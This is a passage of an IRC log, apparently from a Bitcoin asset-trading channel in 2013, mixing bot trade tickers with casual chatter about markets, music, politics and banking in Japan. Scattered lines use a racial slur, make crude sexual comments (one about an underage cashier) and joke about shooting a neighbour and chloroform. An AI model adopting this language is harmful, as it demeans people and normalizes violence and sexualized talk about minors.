and extract cocaine Sep 30 06:28:21 [BTCTC] [ASICMINER-PT] 3 @ 1.32766666 = 3.983 BTC [+] {2} Sep 30 06:28:27 https://www.youtube.com/watch?v=trosB4pa3vg Sep 30 06:28:39 How am I supposed to know that? Sep 30 06:28:41 he was actually cooking bath salts, thats how fresh he is Sep 30 06:28:54 Bath and Bodyworks yo Sep 30 06:29:01 Aroma therapy in the jacuzzi Sep 30 06:29:17 remove naighbours face with shotgun, skip bail Sep 30 06:31:08 profit Sep 30 06:31:59 when's the ipo ? Sep 30 06:32:22 you wont get a cent out of mcafee Sep 30 06:32:46 thats all his money Sep 30 06:33:09 rule 1 Sep 30 06:34:04 you can wink at his girls, don't glance at his money Sep 30 06:35:07 hes on my cool party list with you mp Sep 30 06:35:29 cameron diaz is coming Sep 30 06:36:13 lolk Sep 30 06:38:01 black tie / beachwear on the queensland coast. private island. fuck amsterdam Sep 30 06:38:14 graets coming Sep 30 06:38:30 i hope he wears black tie Sep 30 06:39:23 !last m s.mpoe Sep 30 06:39:23 Last trade for S.MPOE on MPEX was at 0.00084009 BTC [-] Sep 30 06:39:30 very nice Sep 30 06:39:59 maybe satoshi, if hes not bust at work Sep 30 06:40:33 we had a person named satoshi at my job Sep 30 06:40:39 he was the worst employee we ever had Sep 30 06:40:47 irony at it's finest Sep 30 06:40:55 did he have a bunch of hot girlfirnends with 150+ iqs Sep 30 06:42:35 [HAVELOCK] [B] [XBOND] 95 @ 0.001169 = 0.1111 BTC [+] Sep 30 06:43:09 black tie and purple sarong - it will be awesome Sep 30 06:43:11 :D Sep 30 06:43:32 lol Sep 30 06:43:51 i wont even ask you to bankroll it if you wear a sarong Sep 30 06:43:52 :) Sep 30 06:44:38 [BTCTC] [NASTY-PT] 147 @ 0.001 = 0.147 BTC [-] {2} Sep 30 06:46:34 i bet we could get hamilton for a week with some sweet talking Sep 30 06:46:49 a night? Sep 30 06:47:16 *chloroform Sep 30 06:47:38 *bitcoin Sep 30 06:47:59 found old wallet with 100btc in it yesterday Sep 30 06:48:00 lmao Sep 30 06:48:17 not enough to retire on yet tho Sep 30 06:48:30 youve got a few years yet old bloke Sep 30 06:48:42 [BTCTC] [COGNITIVE] 4 @ 0.0660225 = 0.2641 BTC [-] {2} Sep 30 06:48:52 you're not even old yet Sep 30 06:49:25 Thats what makes early retirement so sweet. You're not yet "old." Sep 30 06:49:43 ^^ Sep 30 06:49:47 graet cant retire Sep 30 06:49:56 lol Sep 30 06:50:17 Why he'd have to work first? :P Sep 30 06:50:24 whats he gonna do when he wakes up in the moring? Sep 30 06:50:43 lounge around and chat on IRC Sep 30 06:50:45 oh wait Sep 30 06:50:50 and get bitcoins Sep 30 06:50:52 that I already do :D Sep 30 06:50:52 lol Sep 30 06:53:05 play some old time rock graet Sep 30 06:53:35 that aussie shit Sep 30 06:54:10 divynals atm Sep 30 06:54:18 *spelling Sep 30 06:54:19 link? Sep 30 06:54:50 mix.com.au/listen Sep 30 06:54:56 but t finished :) Sep 30 06:55:32 shes dead Sep 30 06:55:49 yah Sep 30 06:56:17 http://www.youtube.com/watch?v=DMSyumchMWA Sep 30 06:56:17 Divinyls - Boys In Town (1981) - YouTube Sep 30 06:59:22 nice slow dance with cameron there Sep 30 07:01:19 her abdomen is so vibrant Sep 30 07:03:18 hamilton island is contesting the americas cup in 4 years Sep 30 07:03:26 2 years? Sep 30 07:03:36 how long between cups? Sep 30 07:04:57 [BTCTC] [LABCOIN] 440 @ 0.00031097 = 0.1368 BTC [-] {2} Sep 30 07:05:58 [BTCTC] [LABCOIN] 6438 @ 0.00030966 = 1.9936 BTC [-] {5} Sep 30 07:05:58 [HAVELOCK] [HIM] 5 @ 0.16999999 = 0.85 BTC [-] Sep 30 07:06:59 [BTCTC] [LABCOIN] 1666 @ 0.00031 = 0.5165 BTC [+] Sep 30 07:09:40 anyway, the old coot has more money than mcafee and he loves spending it Sep 30 07:10:02 [BTCTC] [LABCOIN] 1587 @ 0.00030977 = 0.4916 BTC [-] {4} Sep 30 07:12:44 now by my reckoning, and considering posecuism, money is inversely proportional to triviality... Sep 30 07:15:20 any truth in that mircea_popescu? Sep 30 07:15:34 as far as i know, theres no book yet Sep 30 07:15:36 hmmm Sep 30 07:15:41 i guess it depends to what is is. Sep 30 07:15:53 well if i may Sep 30 07:16:04 .. with a philisophical question.. Sep 30 07:16:34 on a normal day, money is the thing? Sep 30 07:16:43 that sounded gay Sep 30 07:17:01 now goats back Sep 30 07:18:11 is insider trading immoral mp? Sep 30 07:18:20 i would say no Sep 30 07:19:49 i think the olymics should allow steroids Sep 30 07:21:40 the olympics shouldn't allow steroids because steroids are lame mang Sep 30 07:21:51 they shrink your peepee Sep 30 07:22:14 [BTCTC] [LABCOIN] 420 @ 0.00030016 = 0.1261 BTC [-] {2} Sep 30 07:22:22 just natural selection at work Sep 30 07:22:26 someone must be best, and despite any factors, it is still a level playing field Sep 30 07:22:47 if you are dumb enough to shrink your peepee you shouldnt be having children anyway Sep 30 07:23:04 well you probably wont Sep 30 07:23:11 but you might run fast Sep 30 07:23:15 [BTCTC] [LABCOIN] 9535 @ 0.00028688 = 2.7354 BTC [-] {4} Sep 30 07:23:59 id like to think its the laws of nature that control man, human morality included Sep 30 07:24:20 isn't morality and ethics philosophical by nature Sep 30 07:24:30 i don't think there is an absolute objective way of looking at it Sep 30 07:24:53 well its all objective really Sep 30 07:25:03 or subjective Sep 30 07:25:33 who knows Sep 30 07:26:22 objectively, if you do something very wrong, man will punish you Sep 30 07:26:30 really? Sep 30 07:26:35 What about the super criminals Sep 30 07:26:39 aka bankers Sep 30 07:26:47 who have robbed niggas for centuries Sep 30 07:26:47 subjectively, if you do something right, light will shine Sep 30 07:27:01 I feel criminals are very effective Sep 30 07:27:36 private banks have save many a "nigga" Sep 30 07:27:53 niggas better off stealin cars yo Sep 30 07:27:57 don't you play GTA? Sep 30 07:28:01 no Sep 30 07:28:10 the american dream is a lie Sep 30 07:28:14 rage against the machine Sep 30 07:28:16 etc. Sep 30 07:28:17 etc. Sep 30 07:28:17 etc. Sep 30 07:28:24 yeah Sep 30 07:30:26 i think the absolute truth, is that if man is flawed, then all institutions built by man are flawed Sep 30 07:30:36 only computers don't lie Sep 30 07:31:31 well... Sep 30 07:32:26 how many chromosomes do you have? Sep 30 07:32:45 46 and 2 Sep 30 07:32:46 jk Sep 30 07:33:02 nevr go full retard Sep 30 07:33:33 unless you're peter griffin Sep 30 07:34:05 your momma Sep 30 07:34:27 full circle Sep 30 07:35:11 not for long Sep 30 07:37:49 moar badmans Sep 30 07:40:38 wow imgur is down Sep 30 07:40:39 moar! Sep 30 07:41:12 :~ Sep 30 07:42:55 http://www.youtube.com/watch?v=f-AdVb1ijLk Sep 30 07:42:56 Revy: Give Me What? Scene (Both Japanese and English) - YouTube Sep 30 07:42:59 eat that goat Sep 30 07:44:04 man who walk sideays thu metal detector always going to bankgok Sep 30 07:48:40 [BTCTC] [LABCOIN] 69306 @ 0.00026836 = 18.599 BTC [-] {24} Sep 30 07:50:42 . Sep 30 07:51:21 lol Sep 30 07:52:05 http://market-ticker.org/akcs-www?post=224712 Sep 30 07:52:06 It's Called Evolution, Gentlemen (Tickerforum Changes) in [Market-Ticker] Sep 30 07:52:13 thats a pissed off tripod gent. Sep 30 07:52:44 [BTCTC] [LABCOIN] 700 @ 0.0002646 = 0.1852 BTC [-] Sep 30 07:53:45 [BTCTC] [BASIC-MINING] 39 @ 0.04261641 = 1.662 BTC [-] {2} Sep 30 07:53:56 waaa tax waaa Sep 30 07:54:24 he has a point. by now the us conssits mostly of conventional tax. Sep 30 07:54:38 ie, arbitrary sums paid by govt as salaries and then taken back as taxes. Sep 30 07:54:45 [BTCTC] [BASIC-MINING] 86 @ 0.04255 = 3.6593 BTC [-] Sep 30 07:54:46 http://www.youtube.com/watch?v=Cj8JrQ9w5jY Sep 30 07:54:47 LCD Soundsystem - Daft Punk Is Playing At My House - YouTube Sep 30 07:54:58 waaaaaaaaa Sep 30 07:55:26 mircea_popescu - is there a place to resubmit public key? getting 404 on http://trilema.com/wp-content/uploads/office.jpg Sep 30 07:55:30 i cant speak about america but a similar system in australia is also unspeakable Sep 30 07:55:41 bloctoc_ yes, sec. Sep 30 07:56:05 http://trilema.com/wp-content/uploads/office.jpg Sep 30 07:56:08 say what? Sep 30 07:56:46 just redphone Sep 30 07:56:47 Vexual i imagine it'd be similar there yes. Sep 30 07:56:47 [BTCTC] [ASICMINER-PT] 3 @ 1.32533333 = 3.976 BTC [-] {2} Sep 30 07:59:01 -Vexual- DCC Chat (220.233.44.35) Sep 30 07:59:41 thanks mircea-popescu Sep 30 08:03:52 this goes out to the swede Sep 30 08:03:56 http://www.youtube.com/watch?v=CVAiGf-fku0 Sep 30 08:03:57 Leaving Home Jebediah - YouTube Sep 30 08:04:55 [BTCTC] [LABCOIN] 2924 @ 0.00027 = 0.7895 BTC [+] Sep 30 08:07:15 half wit nit wit fuck wit Sep 30 08:08:09 pisser peon Sep 30 08:11:12 http://www.metacafe.com/watch/an-5m_5tJu2thbJmm/waterworld_1995_the_mariner_saves_enola/ Sep 30 08:11:13 Waterworld (1995): The Mariner Saves Enola - Video Sep 30 08:13:03 [MPEX] [S.MPOE] 2900 @ 0.00084333 = 2.4457 BTC [+] {2} Sep 30 08:14:04 [BTCTC] [LABCOIN] 19633 @ 0.00028949 = 5.6836 BTC [+] {6} Sep 30 08:19:10 [BTCTC] [LABCOIN] 10419 @ 0.00030581 = 3.1862 BTC [+] {4} Sep 30 08:37:17 what do you mean tripod, mircea_popescu? Sep 30 08:38:05 it was a hosting service before livejournal and myspace. Sep 30 08:38:18 ha whoa take me way back Sep 30 08:38:37 right ? back when people randomly peppered icons of typerwiters and whatnot on text Sep 30 08:39:20 there was movement at the station, for the word had got around, that the colt from old regret had got away Sep 30 08:41:02 and had joined the wild bush horses, he was worth a thousand pound, so all the cracks had gathered at the fray Sep 30 08:41:32 [BTCTC] [ASICMINER-PT] 2 @ 1.323 = 2.646 BTC [-] Sep 30 08:41:46 tws mulga bill, from eaglehawk, that sought his own abode Sep 30 08:42:03 he perched above the pecipise, beside the mountain road Sep 30 08:42:37 he turned the cycle down the hill Sep 30 08:42:44 and mounted for the frey Sep 30 08:42:54 but eyre hed gone a dozen yards Sep 30 08:43:00 it bolted clean away Sep 30 09:02:48 http://www.youtube.com/watch?v=VY-JRSSH9Io Sep 30 09:02:48 Cold Chisel-Shipping Steel.(Jimmy Barnes) - YouTube Sep 30 09:08:59 [BTCTC] [LABCOIN] 6510 @ 0.00028846 = 1.8779 BTC [-] {8} Sep 30 09:10:00 [BTCTC] [LABCOIN] 3853 @ 0.00029019 = 1.1181 BTC [+] {2} Sep 30 09:11:32 http://www.youtube.com/watch?v=m3lAjyUUS1g Sep 30 09:11:33 007 Ultimate Bond Girl - YouTube Sep 30 09:13:01 this channel had such a high signal to noise ratio before the incessant aus vidspam emerged Sep 30 09:13:16 is that right? Sep 30 09:13:20 the joke is in saying "signal to noise" in reference to this channel Sep 30 09:13:23 but also srsly Sep 30 09:13:48 who do you think will broadcast the bloackcahin on hf if the shit egts shut down? Sep 30 09:14:27 bloke* Sep 30 09:14:34 i bloke it up at every opportunity Sep 30 09:16:13 benkay_ because it's all signal ? Sep 30 09:16:28 theses a man who can info Sep 30 09:16:58 mircea_popescu once i silenced assbot Sep 30 09:17:22 dead men tell no tales you know Sep 30 09:17:24 assbot is our lady of the lolz. Sep 30 09:17:59 what lady would be named thus? Sep 30 09:18:04 all the good shit pending : Sep 30 09:18:05 http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/ Sep 30 09:18:09 BitBet - KnCMiner will deliver ASIC devices before October 1st Sep 30 09:18:13 http://bitbet.us/bet/358/bitcoin-atm-will-have-at-least-one-atm/ Sep 30 09:18:15 BitBet - Bitcoin ATM will have at least one ATM unit up and running by the end of September 2013 Sep 30 09:18:39 poing pong, asics are hard Sep 30 09:19:45 even in china Sep 30 09:21:10 theyll fuck you today, or fuck you on wedesday Sep 30 09:21:44 less violent Sep 30 09:22:19 lcd Sep 30 09:22:25 MtGox BTCUSD ticker | Best bid: 143.67016, Best ask: 143.77222, Bid-ask spread: 0.10206, Last trade: 144.50000, 24 hour volume: 10406.47950145, 24 hour low: 142.00000, 24 hour high: 145.81000, 24 hour vwap: 144.53249 Sep 30 09:23:02 did someone say rape? Sep 30 09:24:43 i know when a biryani smells funny Sep 30 09:28:01 http://trilema.com/2012/the-politics-of-bitcoin/ Sep 30 09:28:02 The politics of Bitcoin pe Trilema - Un blog de Mircea Popescu. Sep 30 09:28:05 bump for 1 year old article! Sep 30 09:30:43 lol dickery Sep 30 09:31:59 we havent even seen what happens yet Sep 30 09:32:21 bitcoin. its a thing. Sep 30 09:33:33 http://www.youtube.com/watch?v=sYi7uEvEEmk Sep 30 09:33:34 Bill Withers - Lovely Day (Original Version) - YouTube Sep 30 09:33:36 just got paid Sep 30 09:37:28 well need a few radios to keep the blockchain rwaltime Sep 30 09:38:03 mircea_popescu pardon an ignorant yank, but what's the story behind "a place where fighting back worked"? Sep 30 09:38:24 listen here ben 10 Sep 30 09:38:29 i think he refers to romania. Sep 30 09:39:08 oh yeah fighting back Sep 30 09:39:25 you mean sitting quietly Sep 30 09:39:30 i get the romania reference Sep 30 09:39:33 it's the history i lack Sep 30 09:40:10 leipzig Sep 30 09:40:53 they changed the whole world with a few town meetings Sep 30 09:41:27 romania saved a little milk for themselves Sep 30 09:42:08 in any case its no great victory Sep 30 09:42:29 you're very clever and all but i need a little bit of concrete references off of which to key my own resarch, Vexual Sep 30 09:43:14 im not clever, i just talk shit and pretend its ture Sep 30 09:44:27 benkay_ well at some point teh peeps went oh enough with this shit and made a revolution Sep 30 09:44:32 a tenuous argument, but anyway. Sep 30 09:44:54 you were wee mp? Sep 30 09:45:24 http://www.infoapollonia.ro/wp-content/uploads/2013/09/sotii-Ceausescu-impuscati.jpg Sep 30 09:46:21 ah referring to global communism Sep 30 09:46:44 socialism, really. Sep 30 09:47:12 that most vile, offensive notion of the sovereignity of the group over the individual. Sep 30 09:47:24 now yall are all about the capitalism Sep 30 09:47:24 contemporary america, in a word. Sep 30 09:47:36 [BTCTC] [LABCOIN] 2700 @ 0.00027645 = 0.7464 BTC [-] {6} Sep 30 09:48:13 quite familiar Sep 30 09:48:48 this corner of the evil empire loves to affect airs of independence but its all of the trivial sort Sep 30 09:48:55 piercings for baristas etc Sep 30 09:49:25 although our revered leaders in this shitty little town did decide that we'd all compost from here on out Sep 30 09:49:44 rather impressively unilaterally for an american governing body Sep 30 09:49:51 not a great decision by my metrics Sep 30 09:50:07 pierce your clit Sep 30 09:50:29 you're like 4 lines behind, v. Sep 30 09:50:33 troll faster. Sep 30 09:50:44 ok Sep 30 09:52:22 yeah, totally independent for a barrista to get a piercing. Sep 30 09:52:48 i hope she had the requisite permits, permissions and allowances. Sep 30 09:53:02 eexpansive clkitoral hood Sep 30 09:53:09 one of the most striking memories i carry from my time in the us is when i asked this cashier out for drinks and she told me she's underage. Sep 30 09:53:36 she had pintsized tits but was too young to drink, this girl. Sep 30 09:54:24 is that the whole story? Sep 30 09:54:37 tis a sad country Sep 30 09:54:47 yours is ben 10 Sep 30 09:55:21 end of an empire Sep 30 09:56:04 can't legally get at 'em till 18 Sep 30 09:56:30 hilarious risks involved in the game regardless of age Sep 30 09:56:36 and they can't drink 'till 21 Sep 30 09:57:00 that's a hard risk to hedge Sep 30 09:57:05 i prefer singers, to bar maids Sep 30 09:57:40 http://www.youtube.com/watch?v=e4UJLHFkWZ8 Sep 30 09:57:41 Yes Sir Boss ft Joss Stone - Come Together - YouTube Sep 30 10:02:50 http://www.youtube.com/watch?v=LZaTlS23pmI Sep 30 10:02:51 Tinpan Orange - Flowers (Triple J Unearthed) - YouTube Sep 30 10:05:54 [HAVELOCK] [B] [XBOND] 850 @ 0.00117 = 0.9945 BTC [+] {2} Sep 30 10:08:49 http://www.youtube.com/watch?v=twRqATdqEOM Sep 30 10:08:49 Fever Ray - When I Grow Up - YouTube Sep 30 10:12:34 Protandrous hermaphrodites refer to organisms that are born male and at some point in their lifespan change sex to female. Protandrous animals include clownfish. Clownfish have a very structured society. In the Amphiprion percula species, there are zero to four individuals excluded from breeding and a breeding pair living in a sea anemone. Dominance is based on size, the female being the largest and the male being the Sep 30 10:12:34 second largest. The rest of the group is made up of progressively smaller non-breeders, which have no functioning gonads. If the female dies, the male gains weight and becomes the female for that group. The largest non-breeding fish then sexually matures and becomes the male of the group. Sep 30 10:12:37 today you learned. Sep 30 10:13:28 shits crazy on the reef Sep 30 10:15:00 mmm joss stone Sep 30 10:24:00 mm goat Sep 30 10:24:07 delicious Sep 30 10:25:13 [BTCTC] [LABCOIN] 978 @ 0.000299 = 0.2924 BTC [+] Sep 30 10:25:14 i wonder if my butcher has goat Sep 30 10:26:14 [BTCTC] [LABCOIN] 2936 @ 0.00029949 = 0.8793 BTC [+] {2} Sep 30 10:27:15 [BTCTC] [LABCOIN] 1475 @ 0.0003 = 0.4425 BTC [+] Sep 30 10:31:19 [BTCTC] [ASICMINER-PT] 2 @ 1.3225 = 2.645 BTC [-] {2} Sep 30 10:32:20 [BTCTC] [B.YABMC] 2507 @ 0.0002 = 0.5014 BTC [-] {2} Sep 30 10:47:35 [BTCTC] [LABCOIN] 2214 @ 0.0003 = 0.6642 BTC [+] {2} Sep 30 10:48:36 [BTCTC] [LABCOIN] 2140 @ 0.0003 = 0.642 BTC [+] {2} Sep 30 10:52:40 [BTCTC] [LABCOIN] 1144 @ 0.0003 = 0.3432 BTC [+] Sep 30 10:53:41 [BTCTC] [LABCOIN] 1144 @ 0.0003 = 0.3432 BTC [+] Sep 30 11:18:04 [BTCTC] [LABCOIN] 2246 @ 0.00030048 = 0.6749 BTC [+] {6} Sep 30 11:19:05 [BTCTC] [ASICMINER-PT] 2 @ 1.323 = 2.646 BTC [+] {2} Sep 30 11:27:13 [BTCTC] [LABCOIN] 1860 @ 0.00030024 = 0.5584 BTC [-] {5} Sep 30 11:31:50 gesell, for opening a bank account in japan to receive japanese domestic transfers you need to be a japanese citizen Sep 30 11:33:25 even if you make a startup there and create a company bank account its really hard to be able to receive japanese domestics... Sep 30 11:35:16 where am i? what is this? Sep 30 11:43:29 [BTCTC] [LABCOIN] 1164 @ 0.00030107 = 0.3504 BTC [+] {4} Sep 30 11:44:18 b0n1: there are better alternatives. :) Sep 30 11:56:54 Ukto, really? Sep 30 11:57:25 I think I spoke to half of japan about that and also with some japanese friends Sep 30 12:01:23 yeah. there are easier ways. :) Sep 30 12:01:47 [BTCTC] [B] [CIPHERMINE.B1] 92 @ 0.00861831 = 0.7929 BTC [-] {3} Sep 30 12:01:57 you mean on the "private" way or on the startup business way? Sep 30 12:02:30 just get a local lawyer to incorporate for you. Sep 30 12:02:39 that's the universal solution to that problem. Sep 30 12:03:29 yeah mircea_popescu thats what I was told too Sep 30 12:03:44 the problems are the costs and to find the right man Sep 30 12:03:49 [BTCTC] [LABCOIN] 1280 @ 0.00030869 = 0.3951 BTC [+] {5} Sep 30 12:06:30 soo, i wonder if the us stumbles into the right thing and just makes this shutdown permanent. Sep 30 12:06:52 [BTCTC] [FN] [DMS.SELLING] 496 @ 0.005075 = 2.5172 BTC [+] Sep 30 12:06:53 [BTCTC] [ASICMINER-PT] 39 @ 1.3032051 = 50.825 BTC [-] {16} Sep 30 12:07:39 what shutdown you are referring to mircea_popescu ? Sep 30 12:08:16 us govt running out of money again. Sep 30 12:40:03 i sure as fuck hope so Sep 30 12:40:26 [BTCTC] [LABCOIN] 2468 @ 0.000299 = 0.7379 BTC [-] Sep 30 12:41:06 i have heard it is somewhat expensive to open a JP account, so press your JP friends hard with girls, booze, food, bling Sep 30 12:41:27 [BTCTC] [LABCOIN] 17129 @ 0.00028045 = 4.8038 BTC [-] {6} Sep 30 12:42:23 hell or guys, depending on their gender/preference Sep 30 12:42:28 [BTCTC] [LABCOIN] 53692 @ 0.00027425 = 14.725 BTC [-] {4} Sep 30 12:48:34 [BTCTC] [LABCOIN] 1650 @ 0.0003 = 0.495 BTC [+] Sep 30 12:49:34 [BTCTC] [LABCOIN] 650 @ 0.0003 = 0.195 BTC [+] {2} Sep 30 12:53:38 [BTCTC] [LABCOIN] 484 @ 0.0002785 = 0.1348 BTC [-] {2} Sep 30 12:55:34 random_cat, i think its more the bureaucratic component that makes the difficulty Sep 30 12:55:57 I know a japanese diplomat even he doesnt know an elegant way so far to handle that from outside of japan Sep 30 12:56:08 except getting the right local guy of course... Sep 30 12:56:34 i have family in JP (but i do not know this part of my family) Sep 30 12:56:44 mircea_popescu, did you actually tried to get a local guy lawyer? Sep 30 12:57:11 well random_cat then get to know them ;) Sep 30 12:57:48 i can report as we sort it out, but for the moment i am ignorant Sep 30 12:58:00 b0n1 i do everywhere i want to do business. Sep 30 12:58:15 haha. i am -- through other family members Sep 30 12:58:30 mircea_popescu, so you have one already? Sep 30 12:58:44 i have one already in every place i want to do business. Sep 30 12:58:58 do you do business in japan? Sep 30 13:00:11 is there a topic on bitcointalk about that? Pretty sure lots of traders are interested in that... Sep 30 13:03:06 only the sort for whom doing business is an excessive cost. Sep 30 13:11:56 [BTCTC] [LABCOIN] 14832 @ 0.000279 = 4.1381 BTC [+] {3} Sep 30 13:13:58 [BTCTC] [ASICMINER-PT] 4 @ 1.3 = 5.2 BTC [-] {2} Sep 30 13:13:58 [BTCTC] [LABCOIN] 619 @ 0.000279 = 0.1727 BTC [+] Sep 30 13:18:20 davout well done. Sep 30 13:18:21 does it work ? Sep 30 13:22:06 [BTCTC] [FN] [BTC-GROWTH] 132 @ 0.08498833 = 11.2185 BTC [+] {3} Sep 30 13:30:14 [BTCTC] [BASIC-MINING] 20 @ 0.045182 = 0.9036 BTC [-] {2} Sep 30 13:40:24 [BTCTC] [ACTIVEMINING] 112 @ 0.001501 = 0.1681 BTC [-] Sep 30 14:26:08 [HAVELOCK] [HIM] 6 @ 0.16999998 = 1.02 BTC [-] Sep 30 14:38:20 [HAVELOCK] [AM1] 1 @ 1.415 BTC [+] Sep 30 14:46:28 [BTCTC] [LABCOIN] 17146 @ 0.00028016 = 4.8036 BTC [-] {2} Sep 30 14:47:29 [BTCTC] [LABCOIN] 7857 @ 0.00029085 = 2.2852 BTC [+] {3} Sep 30 14:52:34 [HAVELOCK] [AM1] 8 @ 1.30107614 = 10.4086 BTC [-] {3} Sep 30 14:54:36 [BTCTC] [LABCOIN] 1000 @ 0.00027819 = 0.2782 BTC [-] {2} Sep 30 14:55:37 [BTCTC] [ASICMINER-PT] 1 @ 1.301 BTC [+] Sep 30 15:00:42 [HAVELOCK] [KCIM] [PAID] 4.53500000 BTC to 907 shares, 500000 satoshi per share Sep 30 15:00:43 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Sep 30 15:01:43 [HAVELOCK] [HIM] [PAID] 40.00000000 BTC to 40`000 shares, 100000 satoshi per share Sep 30 15:05:31 mircea_popescu: there's still work to get everything smoothly running Sep 30 15:05:47 [BTCTC] [ASICMINER-PT] 1 @ 1.321 BTC [+] Sep 30 15:10:52 [BTCTC] [BASIC-MINING] 10 @ 0.0449 = 0.449 BTC [-] Sep 30 15:12:54 [BTCTC] [B.YABMC] 1258 @ 0.0002 = 0.2516 BTC [-] Sep 30 15:12:55 [BTCTC] [LABCOIN] 18777 @ 0.0002703 = 5.0754 BTC [-] {8} Sep 30 15:14:56 [BTCTC] [LABCOIN] 5500 @ 0.0002691 = 1.4801 BTC [-] {4} Sep 30 15:17:59 [BTCTC] [BASIC-MINING] 10 @ 0.042551 = 0.4255 BTC [-] {2} Sep 30 15:19:00 [BTCTC] [BASIC-MINING] 149 @ 0.0400859 = 5.9728 BTC [-] {4} Sep 30 15:21:02 [BTCTC] [ASICMINER-PT] 1 @ 1.322 BTC [+] Sep 30 15:29:11 [BTCTC] [DMS.MINING] 476 @ 0.00120208 = 0.5722 BTC [-] {2} Sep 30 15:30:12 [BTCTC] [LABCOIN] 6000 @ 0.00026837 = 1.6102 BTC [-] {2} Sep 30 15:33:15 [BTCTC] [LABCOIN] 2048 @ 0.00026217 = 0.5369 BTC [-] {2} Sep 30 15:38:20 [BTCTC] [BFMINES] 400 @ 0.001469 = 0.5876 BTC [+] Sep 30 15:38:20 [BTCTC] [LABCOIN] 520 @ 0.000261 = 0.1357 BTC [-] {2} Sep 30 15:39:21 [BTCTC] [B] [CIPHERMINE.B1] 1100 @ 0.00854072 = 9.3948 BTC [-] {5} Sep 30 15:39:22 [BTCTC] [ASICMINER-PT] 4 @ 1.28675 = 5.147 BTC [-] {3} Sep 30 15:40:21 [BTCTC] [ACTIVEMINING] 112 @ 0.001501 = 0.1681 BTC [-] Sep 30 15:44:25 [BTCTC] [LABCOIN] 1600 @ 0.00027 = 0.432 BTC [+] Sep 30 15:51:32 [BTCTC] [LABCOIN] 1144 @ 0.00026 = 0.2974 BTC [-] Sep 30 15:55:36 [BTCTC] [LABCOIN] 13176 @ 0.00025337 = 3.3384 BTC [-] {8} Sep 30 15:57:38 [BTCTC] [ASICMINER-PT] 2 @ 1.285 = 2.57 BTC [-] Sep 30 15:58:39 [BTCTC] [ACTIVEMINING] 112 @ 0.001501 = 0.1681 BTC [-] Sep 30 16:01:42 [BTCTC] [LABCOIN] 10000 @ 0.00025233 = 2.5233 BTC [-] {3} Sep 30 16:03:14 hi Sep 30 16:03:44 [BTCTC] [ACTIVEMINING] 112 @ 0.001501 = 0.1681 BTC [-] Sep 30 16:04:45 [BTCTC] [LABCOIN] 29335 @ 0.0002522 = 7.3983 BTC [-] {2} Sep 30 16:06:47 [BTCTC] [ACTIVEMINING] 450 @ 0.0015 = 0.675 BTC [-] Sep 30 16:06:47 [BTCTC] [LABCOIN] 24512 @ 0.0002522 = 6.1819 BTC [-] {4} Sep 30 16:09:50 [BTCTC] [FIMB] 99 @ 0.008 = 0.792 BTC [+] Sep 30 16:15:56 [BTCTC] [LABCOIN] 2000 @ 0.0002522 = 0.5044 BTC [-] Sep 30 16:20:00 [BTCTC] [LABCOIN] 1582 @ 0.00025221 = 0.399 BTC [+] {2} Sep 30 16:24:04 [MPEX] [S.MPOE] 1850 @ 0.00084549 = 1.5642 BTC [+] Sep 30 16:26:06 [BTCTC] [LABCOIN] 43600 @ 0.00025132 = 10.9576 BTC [-] {5} Sep 30 16:28:08 [BTCTC] [LABCOIN] 45500 @ 0.00025019 = 11.3836 BTC [-] {7} Sep 30 16:29:09 [BTCTC] [LABCOIN] 15200 @ 0.0002359 = 3.5857 BTC [-] {11} Sep 30 16:30:10 [BTCTC] [LABCOIN] 7389 @ 0.00022505 = 1.6629 BTC [-] {3} Sep 30 16:31:11 [BTCTC] [ASICMINER-PT] 2 @ 1.326 = 2.652 BTC [+] Sep 30 16:32:12 [HAVELOCK] [HIM] 4 @ 0.15000002 = 0.6 BTC [-] Sep 30 16:33:13 [HAVELOCK] [VTX] 1 @ 0.5 BTC [-] Sep 30 16:47:03 ;;seen ThickAsThieves Sep 30 16:47:03 ThickAsThieves was last seen in #bitcoin-assets 5 days, 22 hours, 10 minutes, and 10 seconds ago: Me, do drugs? Never. Sep 30 16:49:16 Doctor_Andonuts: he rebranded himself to TAT_Investments, was here yest Sep 30 16:49:54 Ahhh, good to know Sep 30 16:50:08 Thanks Sep 30 16:51:59 ;;ticker Sep 30 16:52:00 MtGox BTCUSD ticker | Best bid: 142.80001, Best ask: 142.81001, Bid-ask spread: 0.01000, Last trade: 142.80001, 24 hour volume: 9983.14810095, 24 hour low: 142.00000, 24 hour high: 145.81000, 24 hour vwap: 144.16699 Sep 30 16:52:37 where is ThickAsThieves lately? Has he done a runner as well Sep 30 16:53:07 ;;TAT_Investments Sep 30 16:53:07 Error: "TAT_Investments" is not a valid command. Sep 30 16:53:11 ;;seen TAT_Investments Sep 30 16:53:12 TAT_Investments was last seen in #bitcoin-assets 16 hours, 15 minutes, and 55 seconds ago: i'm in cyprus atm Sep 30 16:53:33 [HAVELOCK] [HIM] 8 @ 0.15 = 1.2 BTC [-] {3} Sep 30 16:54:34 [BTCTC] [LABCOIN] 11513 @ 0.0002252 = 2.5927 BTC [-] {2} Sep 30 17:01:13 he went on a trip planned long before burnside happened Sep 30 17:02:42 [BTCTC] [LABCOIN] 1000 @ 0.0002252 = 0.2252 BTC [-] Sep 30 17:04:44 [BTCTC] [LABCOIN] 4807 @ 0.00022393 = 1.0764 BTC [-] {3} Sep 30 17:05:59 tat is in cyprus Sep 30 17:06:03 probably not on irc Sep 30 17:10:01 I was out during the announcement. Sep 30 17:10:13 Came back and paid all people redeeming my BTC-BOND Sep 30 17:12:34 thoughts on gold bullion coins? Sep 30 17:12:40 i'd like to grab some Sep 30 17:12:48 leaning towards canadian gold maple leafs Sep 30 17:13:52 [BTCTC] [LABCOIN] 10000 @ 0.00020804 = 2.0804 BTC [-] {4} Sep 30 17:15:47 Good ol maple leafs Sep 30 17:15:54 [BTCTC] [LABCOIN] 38879 @ 0.00020624 = 8.0184 BTC [-] {7} Sep 30 17:16:13 I don't have any trust in future gold value. Sep 30 17:17:01 i don't have any trust in anything's future value Sep 30 17:17:34 ergo, a portion of my btc will be turned into gold Sep 30 17:18:09 I have trust in my future worth. I'll always have trust in that. Sep 30 17:18:23 hm, that's fair Sep 30 17:18:37 i'll buy a percentage of your future income Sep 30 17:19:27 actually, i won't :( Sep 30 17:20:06 but yeah, i've got some gold pieces that have numismatic value, and it'd be great to shore that up with some straight-up bullion Sep 30 17:20:53 Maybe it's a mistake. Maybe you want to buy a percentage of my future income. Sep 30 17:20:59 [BTCTC] [LABCOIN] 4319 @ 0.00020178 = 0.8715 BTC [-] {3} 